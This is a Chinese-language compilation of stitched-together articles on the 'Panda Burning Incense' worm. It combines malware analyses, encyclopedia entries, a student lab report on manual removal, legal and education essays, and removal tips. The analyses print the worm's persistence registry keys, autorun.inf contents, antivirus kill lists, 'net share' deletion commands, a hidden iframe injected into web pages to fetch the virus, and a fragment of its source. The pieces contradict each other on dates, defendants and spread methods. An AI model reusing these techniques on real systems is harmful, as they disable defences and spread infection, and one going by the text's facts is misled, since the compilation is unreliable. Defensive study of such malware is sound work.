信息安全 熊猫烧香病毒剖析

最近出现新的病毒名为熊猫烧香，危害较大，感染后所有EXE可执行文件图标变成一个烧香的熊猫，大家电脑如出现此现象可认真阅读以下文章：一、病毒描述：含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个Autorun.inf 文件，使得用户打开该盘时激活病毒体。

随后病毒体开一个线程进行本地文件感染，同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。

二、病毒基本情况：[文件信息]病毒名: Virus.Win32.EvilPanda.a.ex$大小: 0xDA00 (55808), (disk) 0xDA00 (55808)SHA1 : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D壳信息: 未知危害级别：高病毒名: Flooder.Win32.FloodBots.a.ex$大小: 0xE800 (59392), (disk) 0xE800 (59392)SHA1 : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24危害级别：高三、病毒行为：Virus.Win32.EvilPanda.a.ex$ ：1、病毒体执行后，将自身拷贝到系统目录：%SystemRoot%\system32\FuckJacks.exeHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ Userini t "C:\WIN2K\system32\SVCH0ST.exe"2、添加注册表启动项目确保自身在系统重启动后被加载：键路径：HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 键名：FuckJacks键值："C:\WINDOWS\system32\FuckJacks.exe"键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 键名：svohost键值："C:\WINDOWS\system32\FuckJacks.exe"3、拷贝自身到所有驱动器根目录，命名为Setup.exe，并生成一个autorun.inf使得用户打开该盘运行病毒，并将这两个文件属性设置为隐藏、只读、系统。

熊猫烧香病毒及祸害熊猫烧香病毒及祸害“熊猫烧香”，是一种经过多次变种的蠕虫病毒变种，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，下面由我给你做出详细的介绍!希望对你有帮助!熊猫烧香病毒：该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。

被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写，2007年1月初肆虐网络，它主要透过下载的文件传染。

2007年2月12日，湖北省公安厅宣布，李俊以及其同伙共8人已经落网，这是中国警方破获的首例计算机病毒大案。

[1]2014年，“熊猫烧香”之父因涉案网络赌场，获刑5年。

中文名熊猫烧香程序类别计算机病毒编写者李俊病毒类型蠕虫病毒新变种外文名Worm.WhBoy或Worm.Nimaya感染系统Win9x/2000/NT/XP/2003/Vista/7泛滥时间2006年底2007年初1基本介绍编辑病毒名称：熊猫烧香，Worm.WhBoy.金山称，Worm.Nimaya。

瑞星称病毒别名：尼姆亚，武汉男生，后又化身为“金猪报喜”，国外称“熊猫烧香”危险级别：★★★★★病毒类型：蠕虫病毒，能够终止大量的反病毒软件和防火墙软件进程。

影响系统：Windows 9x/ME、Windows 2000/NT、Windows XP、Windows 2003 、Windows Vista 、Windows 7发现时间：2006年10月16日来源地：中国武汉东湖高新技术开发区关山2病毒描述编辑熊猫烧香其实是一种蠕虫病毒的变种，而且是经过多次变种而来的，由于中毒电脑的可执行文件会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。

但原病毒只会对EXE图标进行替换，并不会对系统本身进行破坏。

而大多数是中的病毒变种，用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

第1篇一、引言2009年，我国发生了一起名为“熊猫烧香”的计算机病毒案件，该病毒迅速传播，对广大网民和计算机用户造成了严重的损失。

此案件引起了社会各界的广泛关注，同时也给我国网络安全法律体系带来了深刻的启示。

本文将从熊猫烧香案件的法律启示出发，探讨我国网络安全法律的完善与发展。

二、熊猫烧香案件的法律背景1. 犯罪主体熊猫烧香案件的主要犯罪主体为被告人张某、李某、王某等人。

他们通过编写、传播计算机病毒，非法获取他人计算机信息系统数据，给社会造成了极大的危害。

2. 犯罪手段被告人通过编写名为“熊猫烧香”的计算机病毒，在网络上大量传播。

该病毒能够入侵他人计算机系统，篡改用户数据，甚至控制他人计算机，造成严重后果。

3. 犯罪后果熊猫烧香案件造成了大量网民的计算机系统瘫痪，给企业和个人带来了巨大的经济损失。

同时，该案件还暴露出我国网络安全法律体系的不完善，使得犯罪分子得以逍遥法外。

三、熊猫烧香案件的法律启示1. 完善网络安全法律体系熊猫烧香案件暴露出我国网络安全法律体系的不完善。

为了更好地维护网络安全，我国应加快网络安全法律的立法进程，提高法律体系的科学性和可操作性。

具体包括：（1）制定专门的网络安全法，明确网络安全的基本原则、法律地位和监管职责；（2）完善网络安全管理制度，加强对网络信息内容的监管，确保网络空间的清朗；（3）加大对网络犯罪的打击力度，提高犯罪成本，使犯罪分子付出应有的代价。

2. 加强网络安全执法力度熊猫烧香案件的发生，暴露出我国网络安全执法力度不足的问题。

为了更好地维护网络安全，我国应加强网络安全执法，具体措施如下：（1）建立健全网络安全执法机构，提高执法队伍的专业化水平；（2）加强执法协作，形成跨部门、跨区域的联合执法机制；（3）加大对网络犯罪的惩处力度，提高犯罪分子的法律风险。

3. 提高网络安全意识熊猫烧香案件的发生，提醒我们要提高网络安全意识。

具体措施如下：（1）加强网络安全教育，提高全民网络安全素养；（2）引导网民合理使用网络，自觉抵制网络病毒和不良信息；（3）鼓励企业和个人加强网络安全防护，提高计算机系统的安全性。

病毒大小：22,886 字节加壳方式：UPack样本MD5：9749216a37d57cf4b2e528c027252062样本SHA1：5d3222d8ab6fc11f899eff32c2c8d3cd50cbd755发现时间：2006.11更新时间：2006.11关联病毒：传播方式：通过恶意网页传播，其它木马下载，可通过局域网、移动存储设备等传播技术分析==========又是“熊猫烧香”FuckJacks.exe的变种，和之前的变种一样使用白底熊猫烧香图标，病毒运行后复制自身到系统目录下：%System%\drivers\spoclsv.exe创建启动项：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "svcshare"="%System%\drivers\spoclsv.exe"修改注册表信息干扰“显示所有文件和文件夹”设置：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanc ed\Folder\Hidden\SHOW ALL]"CheckedValue"=dword:00000000在各分区根目录生成副本：X:\setup.exeX:\autorun.infautorun.inf内容：[AutoRun]OPEN=setup.exeshellexecute=setup.exeshell\Auto\command=setup.exe尝试关闭下列窗口：QQKavQQA VVirusScanSymantec AntiVirusDubaWindowsesteem procsSystem Safety Monitor Wrapped gift Killer Winsock Expert msctls_statusbar32pjf(ustc)IceSword结束一些对头的进程：Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exescan32.exe Ravmond.exe CCenter.exe RavTask.exeRav.exeRavmon.exe RavmonD.exe RavStub.exeKVXP.kxp KvMonXP.kxp KVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exeTrojDie.kxp FrogAgent.exeLogo1_.exeLogo_1.exeRundl132.exe禁用一系列服务：Schedule sharedaccess RsCCenter RsRavMon RsCCenter RsRavMonKVWSCKVSrvXPkavsvcA VPMcAfeeFrameworkMcShieldMcTaskManagernavapsvcwscsvcKPfwSvcSNDSrvcccProxyccEvtMgrccSetMgrSPBBCSvcSymantec Core LCNPFMntorMskServiceFireSvc删除若干安全软件启动项信息：RavTaskKvMonXPkavKA VPersonal50McAfeeUpdaterUINetwork Associates Error Reporting ServiceShStatEXEYLive.exeyassistse使用net share命令删除管理共享：net share X$ /del /ynet share admin$ /del /ynet share IPC$ /del /y遍历目录，感染除以下系统目录外其它目录中的exe、com、scr、pif文件：X:\WINDOWSX:\WinntX:\System Volume InformationX:\Recycled%ProgramFiles%\Windows NT%ProgramFiles%\WindowsUpdate%ProgramFiles%\Windows Media Player%ProgramFiles%\Outlook Express%ProgramFiles%\Internet Explorer%ProgramFiles%\NetMeeting%ProgramFiles%\Common Files%ProgramFiles%\ComPlus Applications%ProgramFiles%\Messenger%ProgramFiles%\InstallShield Installation Information%ProgramFiles%\MSN%ProgramFiles%\Microsoft Frontpage%ProgramFiles%\Movie Maker%ProgramFiles%\MSN Gamin Zone将自身捆绑在被感染文件前端，并在尾部添加标记信息：.WhBoy{原文件名}.exe.{原文件大小}.与之前变种不同的是，这个病毒体虽然是22886字节，但是捆绑在文件前段的只有22838字节，被感染文件运行后会出错，而不会像之前变种那样释放出{原文件名}.exe的原始正常文件。

熊猫烧香（源代码）(一) 主程序段分析原“熊猫烧香”病毒“源码”主程序段代码如下所示：{==================主程序开始====================}beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之？end;//如果是原始病毒体自己if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 thenInfectFiles //感染和发邮件else //已寄生于宿主程序上了，开始工作beginTmpFile := ParamStr(0); //创建临时文件……....Line nDelete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, '.', Si, Pi); //创建新进程运行之……....Line n+7InfectFiles; //感染和发邮件end;end.对于代码：RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程虽然源码提供者省略了相应实现，但这是比较基本的编程实现。

通过把自身注册为服务进程，可以使自己随着系统的启动一起启动。

熊猫烧香病毒介绍【基本信息】病毒名称:熊猫烧香，Worm.WhBoy.（金山称），Worm.Nimaya.（瑞星称）病毒别名：尼姆亚，武汉男生，后又化身为“金猪报喜”，国外称“熊猫烧香”危险级别：★★★★★病毒类型：蠕虫病毒，能够终止大量的反病毒软件和防火墙软件进程。

影响系统：Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista “熊猫烧香”的制造者熊猫烧香病毒的制造者-李俊一个水泥厂技校毕业的中专生，一个从未接受过专业训练的电脑爱好者，一个被杀毒软件公司拒之门外的年轻人，查毒了小半个中国互联网。

如果不是地震引发海底光缆故障，那只颔首敬香的“熊猫”，还将“迁徙”到更远的地方。

家人眼中的李俊：李俊的父母一直在家乡一水泥厂上班，几前年双双下岗，他妈妈做了个小推车在街上卖早点，他爸爸则到了一家私人瓦厂打工。

52岁的李俊妈妈陈女士说，李俊很小的时候就喜欢玩电脑，没事就到网吧去玩，因为怕他在外面学坏，家里就给他买了台电脑。

没想到到头来儿子却是因为“玩电脑”被警察抓走，陈女士感到悔恨不已。

李俊的父亲则说，四五岁时，李俊爱上了玩积木及拆卸家中的小机械，那时候，李俊将家中的收音机、闹钟、手电筒等凡是能拆开的物品，都拆成一个个零部件，歪着脑袋观察每个零部件后，又将零部件重新组装起来，恢复原样。

如果闹钟再次走动或收音机能发出声音时，李俊往往会拍手大笑，自顾自庆祝半天。

李俊的弟弟李明比他小三岁，西南民族大学音乐教育专业学生，今年放寒假回家，他偶尔和哥哥提起最近他和同学都中过的“熊猫烧香”电脑病毒。

哥哥听说后却一改以往的内向和谦卑，不屑一故地笑说：“这病毒没什么大不了。

”当时李明并没有想到，他的哥哥就是“熊猫烧香”的始作俑者。

李明告诉记者，哥哥在上学时数学和英语非常优秀，尽管如此，哥哥还是没能考上高中，而是进了水泥厂里自办的一所技校(现已改名为“娲石职业技术学校”)，后于2 000年到武汉一家电脑城打工后，自己有了收入，但他很少给家人钱花。

病毒在“%SystemRoot%\system32\drivers\”目录下释放文件splclsv.exe；在系统各个分区创建自动运行文件autorun.inf和病毒副本setup.exe。

病毒在注册表HKCU\Run下创建svcshare键，将创建的spoclsv.exe设为开机自动运行；同时修改文件隐藏属性，不显示隐藏文件。

病毒在注册表中删除瑞星、金山、McA、卡巴斯基、雅虎助手等杀毒软件的开机自启动项。

由于病毒对任务管理器和注册表进程进行了监控，这两个程序一旦运行，就立即终止。

在IceSword中看到有splclsv.exe和gamesetup.exe两个病毒进程。

在IceSword中可以看到，病毒开启了很多TCP连接，378个TCP连接中，有360多个都是病毒开启的。

对网络的性能影响很大。

个文件夹下写入desktop.ini文件，此文件里面只包含一个日期信息。

在.htm文件结尾插入72字节的隐藏框架：
从XueTr工具可以看出，系统中运行的所有程序都被感染（文件均末签名）。

内核模块文件文件也被替换，这导致开机无法正常启动，只能进入安全模式。

对于感染此病毒的计算机，只有进行全盘杀毒，才能彻底清除病毒。

同时由于病毒创建了大量的垃圾文件desktop.ini，删除起来有些困难。

只是很可惜的是没看到可执行文件感染病毒后图标变成熊猫拄着3柱香的样子（嘿嘿……）。

Nimaya（熊猫烧香）病毒特点及解决方法近期校园网中大量的出现了“熊猫烧香”病毒及其新变种，现将新变种的特征和感染现象作出分析，供大家在工作中参考。

一．感染现象及传播途径“熊猫烧香”及其变种是通过局域网内的网络共享来感染终端计算机的蠕虫病毒，主要感染的目标系统为windows 2000 和XP。

病毒会在系统的所以盘符或最后一个盘符下生成一个熊猫烧香或常见可执行文件的图标（如杀毒软件等）,文件名为setup.exe/gamesetup.exe/autorun.exe等的可执行文件来诱导用户点击执行,释放后继而感染word、execl等后缀名为.exe的文件，使用户无法正常应用工作软件。

该病毒修改文件夹属性使“显示所有隐藏文件”和“显示受保护的系统文件选项”失效。

二．病毒特点1、病毒感染终端后将自身复制到Windows文件夹下,文件名为：%SystemRoot%\autorun.inf 并将其属性改为隐藏2、病毒感染终端后，病毒将病毒体复制到为以下文件：%SystemRoot%\setup.exe并将其属性改为隐藏3、病毒在每个分区下生成gamesetup.exe/set.exe/autorun.exe文件,并在C:\Documents and Settings\Administrator\Local Settings\Temp下加载zt.exe和w1.exe或ztw1.exe等文件4、病毒会在c：\winnt\system32\drivers\文件夹下生成spoclv.exe文件。

5、病毒通过添加如下注册表项实现病毒开机自动运行:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "load"="C:\\WINNT\\zt.exe"或w1.ext””[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] "load"="C:\\WINNT\\rundl132.exe"7、枚举以下杀毒软件进程名，查找到后终止其进程：Ravmon.exe、Eghost.exe、Mailmon.exe、KA VPFW.EXE、IPARMOR.EXE、Ravmond.exe、KV、Mcshield.exe8、同时病毒尝试利用以下命令终止相关杀病毒软件并删除服务：net stop "Kingsoft AntiVirus Service"net stop “Ravservice”9、发送arp探测数据，判断网络状态，网络可用时，枚举内网所有共享主机，并使用自带的口令库猜测破解\\IPC$、\admin$等共享目录，连接成功后进行网络感染。

熊猫烧香熊猫烧香跟灰鸽子不同,这是名副其实的病毒，是一种经过多次变种的“蠕虫病毒”变种，2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写，拥有感染传播功能，2007年1月初肆虐网络，它主要通过下载的档案传染，受到感染的机器文件因为被误携带间接对其他计算机程序、系统破坏严重。

2013年6月病毒制造者张顺和李俊因伙同他人开设网络赌场，再次获刑。

病毒原理熊猫烧香其实是一种蠕虫病毒的变种，而且是经过多次变种而来的，由于中毒计算机的可执行文件会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。

但原病毒只会对EXE图标进行替换，并不会对系统本身进行破坏。

而大多数是中等病毒变种，用户计算机中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

同时，该病毒的某些变种可以通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致企业局域网瘫痪，无法正常使用，它能感染系统中exe，com，pif，src，html，asp等文件，它还能终止大量的反病毒软件进程并且会删除扩展名为gho的备份文件。

被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

中毒症状中毒时的电脑桌面除通过网站带毒感染用户之外，此病毒还会在局域网中传播，在极短时间之内就可以感染几千台计算机，严重时可以导致网络瘫痪。

中毒电脑上会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。

中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

病毒危害中毒时会弹出的窗口病毒会删除扩展名为gho的文件，使用户无法使用ghost软件恢复操作系统。

“熊猫烧香”感染系统的.exe .com. f.src .html.asp文件，添加病毒网址，导致用户一打开这些网页文件，IE就会自动连接到指定的病毒网址中下载病毒。

在硬盘各个分区下生成文件autorun.inf和setup.exe，可以通过U盘和移动硬盘等方式进行传播，并且利用Windows 系统的自动播放功能来运行，搜索硬盘中的.exe可执行文件并感染，感染后的文件图标变成“熊猫烧香”图案。

《网络攻击与防御》实验报告计算机科学与技术学院计算机系网络教研室制实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。

现将实验报告撰写的有关内容说明如下：1、实验报告模板为电子版。

2、下载统一的实验报告模板，学生自行完成撰写和打印。

报告的首页包含本次实验的一般信息：组号：例如：2-5 表示第二班第5组。

实验日期：例如：05-10-06 表示本次实验日期。

(年-月-日)……实验编号：例如：表示第一个实验。

实验时间：例如：2学时表示本次实验所用的时间。

实验报告正文部分，从六个方面（目的、内容、步骤等）反映本次实验的要点、要求以及完成过程等情况。

模板已为实验报告正文设定统一格式，学生只需在相应项内填充即可。

续页不再需要包含首页中的实验一般信息。

3、实验报告正文部分具体要求如下：一、实验目的本次实验所涉及并要求掌握的知识点。

二、实验环境实验所使用的设备名称及规格，网络管理工具简介、版本等。

三、实验内容与实验要求实验内容、原理分析及具体实验要求。

四、实验过程与分析根据具体实验，记录、整理相应命令、运行结果等，包括截图和文字说明。

详细记录在实验过程中发生的故障和问题，并进行故障分析，说明故障排除的过程及方法。

五、实验结果总结对实验结果进行分析，完成思考题目，总结实验的心得体会，并提出实验的改进意见。

1）掌握熊猫烧香病毒的工作原理和感染方法；2）掌握手工清除熊猫病毒的基本方法。

目标主机为windows-2003所用到的工具o Wsyschecko Filemon三、实验内容与实验要求蠕虫原理1）蠕虫定义2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。

这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。

实验3 熊猫烧香病毒分析与手工清除一、实验目的（1）了解熊猫烧香病毒对系统注册表、文件系统的破坏；（2）熟悉和掌握计算机病毒的感染分析法，及手工清除PE病毒的基本方法。

二、实验内容与要求（1）利用注册表监视软件监视、记录熊猫烧香病毒对注册表的修改行为。

（2）熊猫烧香病毒启动后，启动注册表编辑器RegEdit.exe和任务管理器taskmgr.exe，观察病毒对这两个系统工具软件的处理。

（3）在C盘根目录下新建123.txt文件，打开该文件，在其中随意输入n 的字符后保存并关闭文件。

将该文件重命名为123.gho。

启动熊猫烧香病毒，观察文件123.gho的变化，观察、记录硬盘中exe文件的图标的变化。

（4）参照课本相关章节中PE病毒分析与清除的相关内容，分析某一PE文件被熊猫烧香病毒感染前后的变化，并借助PE文件工具软件手工清除该PE文件中的熊猫烧香。

三、实验环境与工具操作系统：基于虚拟机的Windows XP/Windows Vista/Windows 7工具软件：LordPE，PEditor，Winhex或其它PE工具软件四、实验步骤（1）熊猫烧香病毒对注册表的修改行为：在Run子键中设置了自动加载选项：HKEY_CURRENT_USER\Software \Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe（2）熊猫烧香病毒启动后，病毒对注册表编辑器RegEdit.exe和任务管理器taskmgr.exe的处理：RegEdit.exe和taskmgr.exe的图形界面出现后立马直接关闭。

接着出现病毒运行的图标。

如下图：再打开注册表编辑器，发现了注册表的折叠杯打开了,结果就是之前检测到熊猫烧香修改的HKEY_LOCAL_MACHINE\Software \Microsoft\Windows NT\Current Version\Image File Execution Options\(3)在C盘根目录下新建123.txt文件，打开该文件，在其中随意输入n的字符后保存并关闭文件。

熊猫烧香病毒样本引言熊猫烧香病毒（也称为Panda Burning Incense，简称Panda）是一种自2007年开始在中国传播的计算机病毒。

熊猫烧香病毒主要通过U盘传播，曾在全球范围内造成了大量的计算机破坏和数据丢失。

本文将探讨熊猫烧香病毒的样本特征及其影响。

病毒样本特征熊猫烧香病毒的样本特征包括以下几个方面：1. 文件扩展名熊猫烧香病毒的样本通常将感染的文件扩展名修改为.exe，以隐藏病毒的真实身份。

这样一来，用户在打开感染的文件时就会执行病毒的代码。

2. 病毒行为熊猫烧香病毒的样本会在感染时将自身复制到系统目录或其他常用目录下，并修改系统注册表以实现开机自启动。

同时，它会搜索用户U盘下的文件，并将自身复制到U盘的根目录和所有子目录中，以便在其他计算机上传播。

3. 源代码特征熊猫烧香病毒的样本通常通过反汇编分析发现它的源代码中包含了大量与计算机破坏行为相关的函数。

这些函数包括删除文件、格式化磁盘、修改系统配置等，可导致计算机系统崩溃或丢失重要数据。

熊猫烧香病毒的影响熊猫烧香病毒的传播速度非常快，曾在短时间内感染了大量的计算机系统。

它的传播方式主要是通过U盘，当感染的U盘插入其他计算机时，病毒就会复制到新的计算机中，并继续传播。

由于熊猫烧香病毒的源代码中包含了大量的破坏性函数，一旦感染计算机系统，就会对系统稳定性和数据安全造成极大威胁。

病毒可以删除关键系统文件，导致系统无法正常启动；它还可以格式化磁盘，使用户的数据永久丢失。

因此，熊猫烧香病毒对个人和组织的计算机系统造成了重大影响。

预防和应对策略针对熊猫烧香病毒的传播和影响，以下是一些预防和应对策略：1.更新杀毒软件：定期更新杀毒软件，以保持对新型病毒的识别和防御能力。

2.谨慎使用U盘：避免使用未知来源的U盘，并定期对U盘进行杀毒扫描。

3.远离非法下载：避免下载非法软件和盗版资源，以减少感染病毒的风险。

4.定期备份数据：定期备份重要数据，以防止数据丢失。

在动手查杀熊猫烧香病毒之前，强烈建议先注意以下四点：1.本文包含两种熊猫烧香病毒变种的描述，请注意查看病毒症状，根据实际情况选用不同的查杀方法。

2.对于被熊猫烧香病毒感染的.exe可执行文件，推荐先备份，再修复！3.找回被熊猫烧香病毒删除的ghost(.gho)文件，详情请见文中！4.对计算机了解不多的用户，请在专家指导下清除熊猫烧香病毒。

熊猫烧香病毒变种一：病毒进程为“spoclsv.exe”这是“熊猫烧香”早期变种之一，特别之处是“杀死杀毒软件”，最恶劣之处在于感染全盘.exe文件和删除.gho文件（Ghost的镜像文件）。

最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。

目前所有专杀工具及杀毒软件均不会修复此病毒行为。

需要手动清除病毒添加的代码，且一定要清除。

否则访问了有此代码的网页，又会感染。

其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。

就不再单独列出。

病毒描述：“武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，（.gho为GHOST的备份文件），使用户的系统备份文件丢失。

被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

以下是熊猫烧香病毒详细行为和解决办法：熊猫烧香病毒详细行为：1.复制自身到系统目录下：%System%/drivers/spoclsv.exe（“%System%”代表Windows所在目录，比如：C:/Windows）不同的spoclsv.exe变种，此目录可不同。

比如12月爆发的变种目录是：C:/WINDOWS/System32/Drivers/spoclsv.exe。

2.创建启动项：[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run] "svcshare"="%System%/drivers/spoclsv.exe"3.在各分区根目录生成病毒副本：X:/setup.exeX:/autorun.infautorun.inf内容：[AutoRun]OPEN=setup.exeshellexecute=setup.exeshell/Auto/command=setup.exe4.使用net share命令关闭管理共享：cmd.exe /c net share X$ /del /ycmd.exe /c net share admin$ /del /y5.修改“显示所有文件和文件夹”设置：[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL]"CheckedValue"=dword:000000006.熊猫烧香病毒尝试关闭安全软件相关窗口：天网防火墙进程VirusScan NOD32 网镖杀毒毒霸瑞星江民黄山IE 超级兔子优化大师木马清道夫QQ病毒注册表编辑器系统配置实用程序卡巴斯基反病毒Symantec AntiVirusDuba Windows 任务管理器esteem procs 绿鹰PC 密码防盗噬菌体木马辅助查找器System Safety Monitor Wrapped gift Killer Winsock Expert游戏木马检测大师超级巡警msctls_statusbar32 pjf(ustc) IceSword7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程：Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exescan32.exe Ravmond.exe CCenter.exe RavTask.exeRav.exeRavmon.exe RavmonD.exe RavStub.exe KVXP.kxpKvMonXP.kxpKVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exeTrojDie.kxpFrogAgent.exe Logo1_.exe Logo_1.exe Rundl132.exe8.禁用安全软件相关服务：Schedule sharedaccess RsCCenter RsRavMon KVWSC KVSrvXPkavsvc AVP McAfeeFramework McShield McTaskManager navapsvcwscsvc KPfwSvc SNDSrvc ccProxy ccEvtMgr ccSetMgrSPBBCSvc Symantec Core LC NPFMntor MskService FireSvc9.删除安全软件相关启动项：SOFTWARE/Microsoft/Windows/CurrentVersion/Run/RavTaskSOFTWARE/Microsoft/Windows/CurrentVersion/Run/KvMonXPSOFTWARE/Microsoft/Windows/CurrentVersion/Run/kavSOFTWARE/Microsoft/Windows/CurrentVersion/Run/KAVPersonal50SOFTWARE/Microsoft/Windows/CurrentVersion/Run/McAfeeUpdaterUISOFTWARE/Microsoft/Windows/CurrentVersion/Run/Network Associates Error Reporting ServiceSOFTWARE/Microsoft/Windows/CurrentVersion/Run/ShStatEXESOFTWARE/Microsoft/Windows/CurrentVersion/Run/YLive.exeSOFTWARE/Microsoft/Windows/CurrentVersion/Run/yassistse10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：<iframe src="hxxp:///wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>但不修改以下目录中的网页文件：C:/WINDOWSC:/WINNTC:/system32C:/Documents and SettingsC:/System Volume InformationC:/RecycledProgram Files/Windows NTProgram Files/WindowsUpdateProgram Files/Windows Media PlayerProgram Files/Outlook ExpressProgram Files/Internet ExplorerProgram Files/NetMeetingProgram Files/Common FilesProgram Files/ComPlus ApplicationsProgram Files/MessengerProgram Files/InstallShield Installation InformationProgram Files/MSNProgram Files/Microsoft FrontpageProgram Files/Movie MakerProgram Files/MSN Gamin Zone11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。

“熊猫烧香”带给教育的思索摘要：本文思考了由“熊猫烧香”病毒作者被捕事件引发的对“80后一代”的教育问题，从教育工作者的角度分析了在当前网络时代教育使其具备健全的人格、养成健康的心理和树立法律的意识问题。

关键词：计算机病毒；网络；教育；犯罪1前言2006年末爆发的“熊猫烧香”病毒使上百万个人用户、网吧及企业局域网用户遭受感染和破坏，被《瑞星2006安全报告》列为十大病毒之首。

“熊猫烧香”病毒作者已被警方逮捕，但病毒的危害并没有随之消除。

目前仍有病毒变种不时威胁着计算机安全。

病毒作者李俊成为我国因编制计算机病毒而被抓捕的第一人，他利用掌握的电脑技术实施犯罪令人惋惜。

人们对事件关注的同时，也应反思，本文拟从教育角度谈些看法。

2背景先来看看病毒作者的经历。

李俊今年25岁，武汉市新洲区人。

2004中专毕业后，工作并不顺利。

在武昌干过网吧管理员，后来到电脑城装机，中间还替人开过车。

还参加过网络技术职业培训班，曾到广东等地的ＩＴ企业应聘，但一直没能如愿。

从2003年起，李俊已经开始了编写病毒的疯狂“修炼”。

2006年作乱于互联网的“熊猫烧香”病毒，不过是李俊三年病毒编写历史中的集大成者。

此前，他编写过“武汉男孩”系列病毒、“QQ尾巴”病毒，并已经知道如何利用病毒牟利。

李俊编写的“熊猫烧香”病毒问世后，通过多种方式进行传播，盗取用户游戏账号、QQ账号。

浙江一位病毒贩卖传播者先是每天给李俊在银行账户上汇3500元，后来每天汇6000元，直至被抓捕前，总计不到一个月时间，他就牟利十几万元。

2007年2月12号，这例由公安部统一部署督办的大案告破，包括李俊在内的8名嫌犯被全部抓获并被刑事拘留。

3分析及思索李俊有自己的抱负。

在上中专时被老师认为是个爱钻研的好学生，2000年到武汉电脑城打工后，自己有了收入。

但他最终用自己掌握的技术实施了犯罪，这让我们不得不思索我们的教育缺失了什么？3.1健全的人格李俊由于只是中专毕业，没有高学历的敲门砖，没能进入理想中的网络安全公司。